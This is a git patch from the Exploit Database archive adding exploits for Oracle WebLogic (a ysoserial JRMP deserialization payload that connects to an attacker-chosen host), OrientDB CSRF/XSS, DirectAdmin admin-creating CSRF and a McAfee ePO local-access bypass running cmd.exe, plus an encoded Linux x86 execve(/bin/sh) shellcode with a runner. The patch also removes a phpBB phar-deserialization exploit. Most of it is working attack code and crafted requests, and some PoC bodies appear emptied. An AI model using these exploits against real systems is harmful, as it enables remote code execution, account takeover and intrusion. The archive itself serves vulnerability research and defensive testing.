From 790ba4b35ea84bc5e7c4d5df31d61e8c6239cabe Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 Mar 2019 05:02:48 +0000 Subject: [PATCH] DB: 2019-03-09 5 changes to exploits/shellcodes Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) phpBB 3.2.3 - Remote Code Execution OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting McAfee ePO 5.9.1 - Registered Executable Local Access Bypass DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes) --- exploits/multiple/remote/46513.java | 112 ++++++------ exploits/multiple/webapps/46517.txt | 268 ++++++++++++++++++++++++++++ exploits/php/webapps/46520.txt | 52 ++++++ exploits/windows/webapps/46518.txt | 45 +++++ files_exploits.csv | 7 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/46519.c | 107 +++++++++++ 7 files changed, 528 insertions(+), 64 deletions(-) create mode 100644 exploits/multiple/webapps/46517.txt create mode 100644 exploits/php/webapps/46520.txt create mode 100644 exploits/windows/webapps/46518.txt create mode 100644 shellcodes/linux_x86/46519.c diff --git a/exploits/multiple/remote/46513.java b/exploits/multiple/remote/46513.java index 97cb07a99..a9f90e502 100644 --- a/exploits/multiple/remote/46513.java +++ b/exploits/multiple/remote/46513.java @@ -1,64 +1,52 @@ -// All greets goes to RIPS Tech -// Run this JS on Attachment Settings ACP page -var plupload_salt = ''; -var form_token = ''; -var creation_time = ''; -var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip -// your payload here -var payload = '\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB'; -var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); -var sid = (new URL(document.location.href)).searchParams.get('sid'); -var url = '/adm/index.php'; -var getparams = { - 'i': 'acp_database', - 'sid': sid, - 'mode': 'backup' -}; -$.get(url, getparams, function(data) { - form_token = $(data).find('[name="form_token"]').val(); - creation_time = $(data).find('[name="creation_time"]').val(); - if(form_token && creation_time) { - var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; - var postdata = { - 'type': 'data', - 'method': 'text', - 'where': 'download', - 'table[]': 'phpbb_config', - 'submit': 'Submit', - 'creation_time': creation_time, - 'form_token': form_token - } - $.post(posturl.replace("|", sid), postdata, function (data) { - plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1]; - if (plupload_salt) { - filepath = filepath.replace("$salt", plupload_salt); - var postdata = new FormData(); - postdata.append('name', 'evil.zip'); - postdata.append('chunk', 0); - postdata.append('chunks', 2); - postdata.append('add_file', 'Add the file'); - postdata.append('real_filename', 'evil.zip'); - // file - var pharfile = new File([byteArray], 'evil.zip'); - postdata.append('fileupload', pharfile); - jQuery.ajax({ - url: '/posting.php?mode=reply&f=2&t=1', - data: postdata, - cache: false, - contentType: false, - processData: false, - method: 'POST', - success: function(data){ - if ("id" in data) { - $('#img_imagick').val(filepath).focus(); - $('html, body').animate({ - scrollTop: ($('#submit').offset().top) - }, 500); - } - } - }); +// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team +// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ +package ysoserial.payloads; - } - }, 'text'); +import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.PayloadRunner; + +import java.lang.reflect.Proxy; +import java.rmi.registry.Registry; +import java.rmi.server.ObjID; +import java.rmi.server.RemoteObjectInvocationHandler; +import java.util.Random; + + +@SuppressWarnings ( { + "restriction" +} ) +@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest") +@Authors({ Authors.MBECHLER }) +public class JRMPClient_20180718_bypass01 extends PayloadRunner implements +ObjectPayload { + public ReferenceWrapper_Stub getObject ( final String command ) throws Exception { + + String host; + int port; + int sep = command.indexOf(':'); + if ( sep < 0 ) { + port = new Random().nextInt(65535); + host = command; + } + else { + host = command.substring(0, sep); + port = Integer.valueOf(command.substring(sep + 1)); + } + ObjID id = new ObjID(new Random().nextInt()); + TCPEndpoint te = new TCPEndpoint(host, port); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref); + return stud; } -}); \ No newline at end of file + + + public static void main ( final String[] args ) throws Exception { + Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader()); + PayloadRunner.run(JRMPClient_20180718_bypass01.class, args); + } +} \ No newline at end of file diff --git a/exploits/multiple/webapps/46517.txt b/exploits/multiple/webapps/46517.txt new file mode 100644 index 000000000..6afad5972 --- /dev/null +++ b/exploits/multiple/webapps/46517.txt @@ -0,0 +1,268 @@ +################################################################################################################################## +# Exploit Title: OrientDB 3.0.17 GA Community Edition (March 7th, 2019) | Multiple Vulnerabilities +# Date: 07.03.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://orientdb.org +# Software Link: https://orientdb.org/download +# Version: 3.0.17 GA Community Edition (March 7th, 2019) +################################################################################################################################## + +Introduction + +OrientDB is the world’s fastest graph database. Period. An independent +benchmark study by IBM and the Tokyo Institute of Technology showed that +OrientDB is 10x faster than Neo4j on graph operations among all the +workloads. Drive competitive advantage and accelerate innovation with new +revenue streams. + +################################################################################# + +Vulnerabilities: CSRF | XSS Reflected & Stored + +################################################################################# + +CSRF details: + +################################################################################# + +CSRF1 + +Create Database + +POST /database/testdb/plocal/graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +Authorization: Basic cm9vdDpyb290 +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=- +Content-Length: 0 + +################################################################################# + +CSRF2 + +Delete Database + +DELETE /database/testdb HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +Authorization: Basic cm9vdDpyb290 +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=- + +################################################################################# + +CSRF3 + +Schema Manage New Vertex + +POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +content-type: text/plain +X-Requested-With: XMLHttpRequest +Content-Length: 33 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +CREATE CLASS `test` extends `V` + +################################################################################# + +CSRF4 + +Schema Manage Delete Vertex + +POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +content-type: text/plain +X-Requested-With: XMLHttpRequest +Content-Length: 17 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +DROP CLASS `test` + +################################################################################# + +CSRF5 + +Add User + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 108 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"} + +################################################################################# + +CSRF6 + +Delete User + +DELETE /document/demodb/5:3 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + + +################################################################################# + +CSRF7 + +Functions Management New + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 141 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":["test"]} + +################################################################################# + +CSRF8 + +Functions Management Delete + +DELETE /document/demodb/6:5 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + + +################################################################################# + +XSS details: + +################################################################################# + +XSS1 Stored + +Add User + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 133 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"} + +PoC + +XSS works on Security Manager Actions - Delete + +################################################################################# + +XSS2 Reflected + +URL +http://192.168.2.101:2480/document/demodb/-1:-1 + +METHOD +Post + +PARAMETER +name + +PAYLOAD + + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 162 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":null} + +PoC + +XSS works on Functions Management - Save + +################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/46520.txt b/exploits/php/webapps/46520.txt new file mode 100644 index 000000000..fbd1acc57 --- /dev/null +++ b/exploits/php/webapps/46520.txt @@ -0,0 +1,52 @@ +# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel +# Date: 03/03/2019 +# Exploit Author: ManhNho +# Vendor Homepage: https://www.directadmin.com/ +# Software Link: https://www.directadmin.com/ +# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN +# Version: 1.55 +# CVE: CVE-2019-9625 +# Tested on: Windows 10 / Kali Linux +# Category: Webapps + + +#1. Description +----------------------------------------------------- +DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to +create new admin account + +#2. PoC +----------------------------------------------------- +a) Send below crafted request to logged in user who is having admin +Administrator level access + + + + +
+ + + + + + + + + +
+ + + + +b) Once the logged in user opens the URL the form will get submitted +with active session of administrator and action get performed +successfully. + +#3. References + +----------------------------------------------------- + + +https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF + +https://nvd.nist.gov/vuln/detail/CVE-2019-9625 \ No newline at end of file diff --git a/exploits/windows/webapps/46518.txt b/exploits/windows/webapps/46518.txt new file mode 100644 index 000000000..2c9e7e5fb --- /dev/null +++ b/exploits/windows/webapps/46518.txt @@ -0,0 +1,45 @@ +# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass +# Date: 2019-03-07 +# Exploit Author: @leonjza +# Vendor Homepage: https://www.mcafee.com/ +# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html +# Version: ePO v5.9.1 +# Tested on: Windows Server 2012 +# CVE : cve-2018-6671 + +GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949 + +# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass +# Specifying an X-Forwarded-For header bypasses the local only check +# https://kc.mcafee.com/corporate/index?page=content&id=SB10240 +# https://nvd.nist.gov/vuln/detail/CVE-2018-6671 +# +# 2019 @leonjza +# +# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850 + +POST /Notifications/testRegExe.do HTTP/1.1 +Host: 192.168.1.26:8443 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) +Gecko/20100101 Firefox/66.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 284 +DNT: 1 +Connection: close +Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1; +orion.login.language="language:en&country:"; +orion.content.size="width:1384&height:699"; +JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15 +X-Forwarded-For: 127.0.0.1 + +orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c +whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard + + +-- +L. +:wq! \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03ebd7a35..9b3016995 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17238,7 +17238,7 @@ id,file,description,date,author,type,platform,port 46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware, 46509,exploits/linux/remote/46509.rb,"Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)",2019-03-07,Metasploit,remote,linux,443 46510,exploits/php/remote/46510.rb,"Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)",2019-03-07,Metasploit,remote,php, -46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2019-10-25,allyshka,remote,multiple, +46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple, 46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple, 46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, @@ -40962,4 +40962,7 @@ id,file,description,date,author,type,platform,port 46500,exploits/php/webapps/46500.txt,"OpenDocMan 1.3.4 - 'search.php where' SQL Injection",2019-03-05,"Mehmet EMIROGLU",webapps,php,80 46505,exploits/php/webapps/46505.txt,"Kados R10 GreenBee - Multiple SQL Injection",2019-03-07,"Mehmet EMIROGLU",webapps,php,80 46511,exploits/php/webapps/46511.js,"WordPress Core 5.0 - Remote Code Execution",2019-03-01,allyshka,webapps,php, -46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2019-12-12,allyshka,webapps,php, +46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2018-12-12,allyshka,webapps,php, +46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple, +46518,exploits/windows/webapps/46518.txt,"McAfee ePO 5.9.1 - Registered Executable Local Access Bypass",2019-03-08,leonjza,webapps,windows, +46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b548ce067..c9a944705 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -949,3 +949,4 @@ id,file,description,date,author,type,platform 46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86 +46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/46519.c b/shellcodes/linux_x86/46519.c new file mode 100644 index 000000000..7f900d3a9 --- /dev/null +++ b/shellcodes/linux_x86/46519.c @@ -0,0 +1,107 @@ +/* +''' +; Date: 07/03/2019 +; Insertion-Encoder.asm +; Author: Daniele Votta +; Description: This program encode shellcode with insertion technique (0xAA). +; Tested on: i686 GNU/Linux +''' + +#!/usr/bin/python +# Python Insertion Encoder + +import random + +# Execve /bin/sh (25 bytes) +shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" +encoded2 = "" + +print 'Encoded shellcode...' + +for x in bytearray(shellcode): + # Insertion Encoding + encoded += '\\x' + encoded += '%02x' % x + encoded += '\\x%02x' % 0xAA + # encoded += '\\x%02x' % random.randint(1,255) + + encoded2 += '0x' + encoded2 += '%02x,' % x + encoded2 += '0x%02x,' % 0xAA + # encoded2 += '0x%02x' % random.randint(1,255) + +print encoded +"\n" +print encoded2 +print 'Len: %d' % len(bytearray(shellcode)) +*/ + +#include +#include + +/* +; Insertion-Decoder.asm +; Author: Daniele Votta +; Description: This program decode shellcode with insertion technique (0xAA). +; Tested on: i686 GNU/Linux +; Shellcode Length:50 +; JMP | CALL | POP | Techniques + +Insertion-Decoder: file format elf32-i386 + +Disassembly of section .text: + +08048080 <_start>: + 8048080: eb 1d jmp 804809f + +08048082 : + 8048082: 5e pop esi + 8048083: 8d 7e 01 lea edi,[esi+0x1] + 8048086: 31 c0 xor eax,eax + 8048088: b0 01 mov al,0x1 + 804808a: 31 db xor ebx,ebx + +0804808c : + 804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1] + 804808f: 80 f3 aa xor bl,0xaa + 8048092: 75 10 jne 80480a4 + 8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1] + 8048098: 88 1f mov BYTE PTR [edi],bl + 804809a: 47 inc edi + 804809b: 04 02 add al,0x2 + 804809d: eb ed jmp 804808c + +0804809f : + 804809f: e8 de ff ff ff call 8048082 + +080480a4 : + 80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp + 80480aa: 68 aa 2f aa 2f push 0x2faa2faa + 80480af: aa stos BYTE PTR es:[edi],al + 80480b0: 73 aa jae 804805c <_start-0x24> + 80480b2: 68 aa 68 aa 2f push 0x2faa68aa + 80480b7: aa stos BYTE PTR es:[edi],al + 80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597] + 80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp + 80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp + 80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp + 80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533] + 80480d6: bb .byte 0xbb + 80480d7: bb .byte 0xbb +[+] Extract Shellcode ... +"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb" + +======================= POC Daniele Votta ======================= +*/ + +/* Insertion Encoded Execve /bin/sh (88 bytes) */ +unsigned char code[] = \ +"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file